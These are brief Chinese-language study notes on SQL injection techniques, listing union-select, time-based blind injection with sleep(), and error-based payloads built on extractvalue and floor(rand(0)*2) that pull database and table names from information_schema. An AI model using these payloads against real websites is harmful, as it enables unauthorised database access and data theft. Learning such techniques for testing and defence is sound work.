union select 联合查询
时间盲注:
and sleep(1) 通过网页的刷新来判断数据库名称,表名称,字段名称
substr('name',m,n) 从传入的字符串的第m个开始取,取n个
ascii() 将字符转化为ascll编码
基于报错注入:
rand(0) 返回0~1 之间的小数
floor(m) 取整数
floor(rand(0)*2) 取 0,1 值
extractvalue(0x7e,concat(database()))
and extractvalue(0x7e,concat(select group_concat(table_name) from information_schema.tables where table_schema=database()))
select concat(count(*),0x7e,floor(rand(0)*2)) as x from information_schema.tables group by
x;